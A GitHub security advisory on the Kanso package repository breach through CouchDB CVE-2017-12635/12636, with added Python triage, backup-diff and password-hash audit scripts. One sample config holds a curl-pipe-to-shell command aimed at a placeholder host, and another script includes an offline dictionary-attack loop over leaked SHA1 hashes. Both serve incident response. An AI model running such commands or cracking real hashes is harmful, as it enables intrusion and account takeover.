This repository has been archived by the owner on Jan 31, 2019. It is now read-only.

Security alert: Kanso package repository #436

Open
caolan opened this issue Mar 26, 2018 · 0 comments

caolan commented Mar 26, 2018

Summary

If you ever had a user account with the Kanso package repository, it is
possible that an attacker has gained access to the following details about
your account:

  • Username
  • A salted, non-iterated SHA1 password hash

If you reused your Kanso password elsewhere you should change your
password on other services immediately.

Detail

In Feb 2015, hosting of the Kanso repository was transferred from a self-hosted
site (kan.so) to a donated third-party mirror. This server is now being retired.

Based upon our preliminary analysis, we believe that a remote attacker created
a Kanso account via an HTTP PUT request, then used their CouchDB credentials
to exploit CVE-2017-12635 (Apache CouchDB Remote Privilege Escalation) and
CVE-2017-12636 (Remote Code Execution) in combination. These two exploits
provided the attacker with arbitrary code execution as the non-root couchdb user.
Failure to apply a critical security update is the root cause. Contributing factors
include (i) human error in credential management leading to a lack of automated
monitoring and patching for the machine in question; and (ii) diffusion of responsibility
and gaps in communication between the donor organization and the project.
Approximately 52 users are potentially affected by this breach.

The attack appears to have been untargeted and relatively unsophisticated, and
employed a well-known malware payload that consumes CPU cycles to mine for
cryptocurrency.

It doesn't appear the attacker achieved root access; however, we should assume
they had access to the CouchDB databases out of an abundance of caution.
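The two CVEs named above were fixed in CouchDB 1.7.0 and 2.1.1, and CVE-2017-12636 works by pointing a `query_servers` entry at an arbitrary command. The following triage script, added here as an example and not part of the Kanso project's own tooling, turns those two facts into checks a responder can run against the JSON bodies of `GET /` and `GET /_config/query_servers`. The sample responses, the `FIXED_VERSIONS` table and the "anything that is not couchjs" heuristic are assumptions of this example, not captured from the retired mirror.

```python
"""
Post-incident triage checks for a CouchDB host: is the version one that
shipped the fixes for CVE-2017-12635 and CVE-2017-12636, and does the
query_servers config still contain only the stock entries? The sample
responses below are constructed, not captured from the Kanso mirror.
"""
import json
import re

# First releases carrying the fixes for both CVEs, per branch.
FIXED_VERSIONS = {1: (1, 7, 0), 2: (2, 1, 1)}

# Languages CouchDB registers out of the box. CVE-2017-12636 is exploited by
# pointing a query server entry at an arbitrary command, so any other
# language, or a command that is not couchjs, deserves a look (heuristic).
DEFAULT_LANGUAGES = {"javascript", "coffeescript"}


def parse_version(text):
    """'1.6.1' -> (1, 6, 1); tolerates suffixes such as '2.1.0-rc1'."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("unrecognised version string: %r" % text)
    return tuple(int(x) for x in m.groups())


def is_patched(version):
    """True if this version includes the fixes for both CVEs."""
    fixed = FIXED_VERSIONS.get(version[0])
    if fixed is None:
        return version[0] > 2  # 3.x and later postdate the fixes; 0.x predate them
    return version >= fixed


def suspicious_query_servers(config):
    """Return {language: command} for query_servers entries that look non-stock."""
    return {lang: cmd for lang, cmd in config.items()
            if lang not in DEFAULT_LANGUAGES or "couchjs" not in cmd}


def triage(root_json, query_servers_json):
    """Combine both checks on the raw JSON bodies of GET / and GET /_config/query_servers."""
    version = parse_version(json.loads(root_json)["version"])
    return {
        "version": version,
        "patched": is_patched(version),
        "suspicious_query_servers": suspicious_query_servers(json.loads(query_servers_json)),
    }


# Constructed sample bodies. The "cmd" entry stands in for the kind of
# foreign query server an attacker adds; the URL is a placeholder.
SAMPLE_ROOT = '{"couchdb":"Welcome","version":"1.6.1"}'
SAMPLE_QUERY_SERVERS = json.dumps({
    "javascript": "/usr/bin/couchjs /usr/share/couchdb/server/main.js",
    "coffeescript": "/usr/bin/couchjs /usr/share/couchdb/server/main_coffee.js",
    "cmd": "/bin/sh -c 'curl -s http://example.invalid/x.sh | sh'",
})

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_ROOT, SAMPLE_QUERY_SERVERS), indent=2))
```

On a live host the two bodies come from `curl -s http://host:5984/` and, with admin credentials, `curl -s http://host:5984/_config/query_servers`. A foreign entry in `query_servers` is the persistence artefact of the 12636 technique and should be treated as evidence of compromise, not merely misconfiguration; the version check alone only tells you the host was exposed.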

Risks

Package integrity

We compared known-good pre-exploit backups of the package database with the
latest data and found no differences. There is no sign of tampering with packages,
documentation or the Kanso homepage.
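The comparison described above can be done mechanically from two `_all_docs?include_docs=true` dumps. The script below is an added example, not the script the Kanso maintainers used: it matches documents by `_id`, reports additions, removals and changed top-level fields, and compares attachments by the `digest` CouchDB records for them, which is what catches a swapped package tarball. The two snapshots are constructed.

```python
"""
Compare a pre-incident backup of a CouchDB database with its current state.
Input for each snapshot is the `rows` array from
`GET /<db>/_all_docs?include_docs=true`; documents are matched by `_id`,
fields compared top-level, and attachments by the digest CouchDB records in
`_attachments`. Both snapshots below are constructed.
"""
import json


def index_by_id(rows):
    """_all_docs rows -> {_id: doc}. Design docs are kept: they carry executable code."""
    return {row["id"]: row["doc"] for row in rows}


def changed_fields(old, new):
    """Top-level keys whose values differ between two revisions of one document."""
    diffs = []
    for key in sorted(set(old) | set(new)):
        if key == "_attachments":
            old_att = {k: v.get("digest") for k, v in old.get(key, {}).items()}
            new_att = {k: v.get("digest") for k, v in new.get(key, {}).items()}
            if old_att != new_att:
                diffs.append(key)
        elif old.get(key) != new.get(key):
            diffs.append(key)
    return diffs


def diff_snapshots(backup_rows, current_rows):
    """Documents added, removed, or modified since the backup."""
    before, after = index_by_id(backup_rows), index_by_id(current_rows)
    modified = {}
    for doc_id in sorted(set(before) & set(after)):
        fields = changed_fields(before[doc_id], after[doc_id])
        if fields:
            modified[doc_id] = fields
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": modified,
    }


def is_clean(report):
    """True when nothing changed: the result the advisory reports for the package db."""
    return not (report["added"] or report["removed"] or report["modified"])


# Constructed snapshots. Attachment digests are placeholders in CouchDB's "md5-..." form.
BACKUP_ROWS = [
    {"id": "pkg-a", "key": "pkg-a", "value": {"rev": "1-aaa"},
     "doc": {"_id": "pkg-a", "_rev": "1-aaa", "name": "pkg-a", "versions": ["1.0.0"],
             "_attachments": {"pkg-a-1.0.0.tgz": {"content_type": "application/x-gzip",
                                                   "digest": "md5-AAAAAAAAAAAAAAAAAAAAAA=="}}}},
    {"id": "pkg-b", "key": "pkg-b", "value": {"rev": "1-bbb"},
     "doc": {"_id": "pkg-b", "_rev": "1-bbb", "name": "pkg-b", "versions": ["0.2.1"]}},
]
CURRENT_ROWS = [
    # pkg-a's tarball was replaced: new revision, same name/versions, different digest.
    {"id": "pkg-a", "key": "pkg-a", "value": {"rev": "2-aa2"},
     "doc": {"_id": "pkg-a", "_rev": "2-aa2", "name": "pkg-a", "versions": ["1.0.0"],
             "_attachments": {"pkg-a-1.0.0.tgz": {"content_type": "application/x-gzip",
                                                   "digest": "md5-BBBBBBBBBBBBBBBBBBBBBB=="}}}},
    BACKUP_ROWS[1],
    {"id": "pkg-c", "key": "pkg-c", "value": {"rev": "1-ccc"},
     "doc": {"_id": "pkg-c", "_rev": "1-ccc", "name": "pkg-c", "versions": ["0.0.1"]}},
]

if __name__ == "__main__":
    report = diff_snapshots(BACKUP_ROWS, CURRENT_ROWS)
    print(json.dumps(report, indent=2))
    print("clean" if is_clean(report) else "DIFFERENCES FOUND")
```

A `_rev` change with no other field reported means a document was rewritten with identical content, which is still worth a look since the `_all_docs` view does not show who wrote it. The backup must come from before the earliest plausible intrusion date, otherwise a tampered package in both snapshots compares as unchanged.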

User Data

We required minimal information during sign up, namely just a username
and password. Unfortunately, the user database pre-dated CouchDB 1.3.0
(when PBKDF2 became the default) and passwords for registrations prior to
the release of CouchDB v1.3.0 were stored as salted SHA1 hashes.
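To make the difference between the two schemes concrete, here is an added example (not Kanso tooling) that reproduces both formats CouchDB writes into `_users` documents, the pre-1.3 `password_sha` (hex SHA1 of the password concatenated with the salt text) and the PBKDF2-HMAC-SHA1 `derived_key` that replaced it, and uses them to list which accounts in a dump still carry the legacy hash and to run the offline guess loop an attacker would. The two user documents, their salts and passwords are constructed.

```python
"""
Audit the user documents from a CouchDB `_users` database for the legacy
salted-SHA1 scheme and show what the two schemes cost an attacker to guess
against. Both hash formats are reproduced from how CouchDB stores them
(`password_sha` = hex SHA1(password || salt text); `derived_key` = hex
PBKDF2-HMAC-SHA1 over the same inputs). The sample users are constructed.
"""
import hashlib
import time


def legacy_sha1(password, salt):
    """Pre-1.3 CouchDB: one SHA1 over the password concatenated with the salt string."""
    return hashlib.sha1(password.encode() + salt.encode()).hexdigest()


def pbkdf2_key(password, salt, iterations):
    """CouchDB >= 1.3: PBKDF2-HMAC-SHA1, 20-byte key, stored hex-encoded."""
    return hashlib.pbkdf2_hmac("sha1", password.encode(), salt.encode(), iterations, 20).hex()


def classify(doc):
    """'pbkdf2', 'legacy-sha1', or 'none' when no credential is stored."""
    if doc.get("password_scheme") == "pbkdf2" and "derived_key" in doc:
        return "pbkdf2"
    if "password_sha" in doc:
        return "legacy-sha1"
    return "none"


def verify(doc, password):
    """Check a candidate password against whichever scheme the document uses."""
    scheme = classify(doc)
    if scheme == "pbkdf2":
        return pbkdf2_key(password, doc["salt"], int(doc["iterations"])) == doc["derived_key"]
    if scheme == "legacy-sha1":
        return legacy_sha1(password, doc["salt"]) == doc["password_sha"]
    return False


def audit(docs):
    """Group usernames by scheme; the legacy list is who must rotate passwords."""
    groups = {"pbkdf2": [], "legacy-sha1": [], "none": []}
    for doc in docs:
        groups[classify(doc)].append(doc["name"])
    return groups


def dictionary_attack(doc, wordlist):
    """The offline loop an attacker runs over a leaked doc; returns the first hit or None."""
    for guess in wordlist:
        if verify(doc, guess):
            return guess
    return None


def guesses_per_second(doc, seconds=0.2):
    """Rough single-core guess rate against this doc's scheme (timing only, not asserted)."""
    n, stop = 0, time.perf_counter() + seconds
    while time.perf_counter() < stop:
        verify(doc, "guess%d" % n)
        n += 1
    return n / seconds


# Constructed sample documents in the shape CouchDB writes to _users.
SALT_A = "3b1e6f0c9d2a4e7b8c5f1a2d3e4b5c6d"
SALT_B = "9f8e7d6c5b4a39281706f5e4d3c2b1a0"
SAMPLE_USERS = [
    {"_id": "org.couchdb.user:alice", "name": "alice", "type": "user", "roles": [],
     "salt": SALT_A, "password_sha": legacy_sha1("hunter2", SALT_A)},
    {"_id": "org.couchdb.user:bob", "name": "bob", "type": "user", "roles": [],
     "password_scheme": "pbkdf2", "iterations": 10, "salt": SALT_B,
     "derived_key": pbkdf2_key("correct horse", SALT_B, 10)},
]

if __name__ == "__main__":
    print(audit(SAMPLE_USERS))
    for doc in SAMPLE_USERS:
        print(doc["name"], classify(doc), "%.0f guesses/s" % guesses_per_second(doc))
```

The salt defeats precomputed tables but nothing else: each legacy guess costs one SHA1, so any password that appears in a wordlist falls quickly, which is why the advisory's advice is to rotate reused passwords rather than hope the hash holds. Note that CouchDB's PBKDF2 default of 10 iterations is itself low; an audit of a current deployment should also report `iterations` and raise it.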

Mitigation

The machine has been retired and no further access is possible.

If you re-used your Kanso password elsewhere you should change your
password on other services immediately. While we have no direct evidence
that password hashes were captured by any malware payload, we should
assume they were.

Help with Disclosure

As we did not require email addresses for registration, we are unable to contact
past Kanso users reliably. If you know of anyone who previously used the
Kanso package repository we would appreciate you sharing this
announcement with them.
